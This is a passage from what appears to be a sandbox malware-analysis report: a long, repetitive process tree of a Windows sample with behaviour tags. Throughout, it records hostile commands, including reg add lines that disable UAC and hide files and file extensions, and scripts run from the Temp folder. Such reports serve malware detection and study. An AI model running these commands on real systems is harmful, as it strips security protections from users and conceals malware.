        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        239⤵
        
        PID:820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        236⤵
        UAC bypass
        
        PID:880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        236⤵
        Modifies registry key
        
        PID:3756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        236⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QIgwosUY.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        236⤵
        
        PID:2188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        237⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        237⤵
        Blocklisted process makes network request
        
        PID:2600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        234⤵
        
        PID:4804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        235⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        234⤵
        
        PID:4024
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        235⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        234⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:3592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gYksMsMw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        234⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:1420
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        235⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        232⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AykMIkkI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        232⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        233⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        232⤵
        
        PID:212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        232⤵
        
        PID:3392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        233⤵
        UAC bypass
        
        PID:5036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        230⤵
        Modifies registry key
        
        PID:1136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        231⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        230⤵
        UAC bypass
        Modifies registry key
        
        PID:1492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        230⤵
        Modifies registry key
        
        PID:3596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RggkUYcE.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        230⤵
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        231⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        231⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HycYsQwg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        228⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        229⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        228⤵
        UAC bypass
        Modifies registry key
        
        PID:1240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        228⤵
        UAC bypass
        Modifies registry key
        
        PID:4828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        229⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        228⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        226⤵
        
        PID:4632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        227⤵
        
        PID:408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWIIMMEc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        226⤵
        
        PID:4172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        227⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        226⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        226⤵
        
        PID:368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SqcUwYAM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        224⤵
        
        PID:4484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        225⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        225⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        224⤵
        Modifies registry key
        
        PID:4580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        225⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        224⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        224⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        222⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        223⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zGgAEQEM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        222⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        223⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        222⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        222⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        220⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        220⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        220⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OOQMwAsg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        220⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        221⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yMsccwsI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        218⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        219⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        218⤵
        UAC bypass
        
        PID:4196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        218⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        218⤵
        
        PID:1432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        216⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        216⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\askowMAU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        216⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        217⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        216⤵
        
        PID:2900
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        215⤵
        
        PID:3080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        214⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        214⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        214⤵
        UAC bypass
        
        PID:1732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AUkkIMII.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        214⤵
        
        PID:3540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        215⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        215⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SwcgcwAQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        212⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        213⤵
        
        PID:680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        212⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        212⤵
        
        PID:404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        212⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZwgoMcUM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        210⤵
        
        PID:368
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        211⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        210⤵
        
        PID:448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        210⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        210⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        208⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        208⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        208⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UcYoMUgI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        208⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        209⤵
        
        PID:3144
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        208⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        206⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sqgUAEUM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        206⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        207⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        206⤵
        Modifies registry key
        
        PID:568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        206⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tGEkgwYc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        204⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        205⤵
        
        PID:716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        204⤵
        
        PID:1756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        204⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        204⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QsYEEocc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        202⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        203⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        202⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        202⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        202⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        200⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        200⤵
        Modifies registry key
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        200⤵
        
        PID:2596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\laEcocgc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        200⤵
        
        PID:2224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        201⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ouYQsMIw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        198⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        199⤵
        
        PID:1660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        200⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        198⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        198⤵
        
        PID:716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        198⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JWMsYYcw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        196⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        197⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        196⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        196⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        196⤵
        Modifies visibility of file extensions in Explorer
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gqUwsowU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        194⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        195⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        194⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        194⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        194⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mCossUko.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        192⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        193⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        192⤵
        
        PID:2184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        192⤵
        UAC bypass
        
        PID:4848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        192⤵
        
        PID:2716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SiEAMUAI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        190⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        191⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        190⤵
        
        PID:1608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        191⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        190⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        190⤵
        
        PID:496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JAYUIQgs.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        188⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:1464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        189⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        188⤵
        Modifies registry key
        
        PID:4228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        188⤵
        Modifies registry key
        
        PID:1732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        188⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UKYAocQI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        186⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        187⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4448
        
        C:\Windows\SysWOW64\reg.exe
        
